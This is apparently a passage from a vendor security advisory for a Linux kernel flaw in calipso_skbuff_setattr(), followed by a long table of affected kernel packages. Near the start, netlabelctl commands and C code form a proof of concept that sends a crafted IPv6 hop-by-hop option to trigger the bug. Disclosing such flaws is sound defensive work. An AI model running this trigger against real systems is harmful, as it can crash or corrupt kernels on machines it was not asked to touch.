skb_cow() within calipso_skbuff_setattr() by only using skb_cow() to grow headroom. PoC: Using `netlabelctl` tool: netlabelctl map del default netlabelctl calipso add pass doi:7 netlabelctl map add default address:0::1/128 protocol:calipso,7 Then run the following PoC: int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP); // setup msghdr int cmsg_size = 2; int cmsg_len = 0x60; struct msghdr msg; struct sockaddr_in6 dest_addr; struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1, sizeof(struct cmsghdr) + cmsg_len); msg.msg_name = &dest_addr; msg.msg_namelen = sizeof(dest_addr); msg.msg_iov = NULL; msg.msg_iovlen = 0; msg.msg_control = cmsg; msg.msg_controllen = cmsg_len; msg.msg_flags = 0; // setup sockaddr dest_addr.sin6_family = AF_INET6; dest_addr.sin6_port = htons(31337); dest_addr.sin6_flowinfo = htonl(31337); dest_addr.sin6_addr = in6addr_loopback; dest_addr.sin6_scope_id = 31337; // setup cmsghdr cmsg->cmsg_len = cmsg_len; cmsg->cmsg_level = IPPROTO_IPV6; cmsg->cmsg_type = IPV6_HOPOPTS; char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr); hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80 sendmsg(fd, &msg, 0);
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
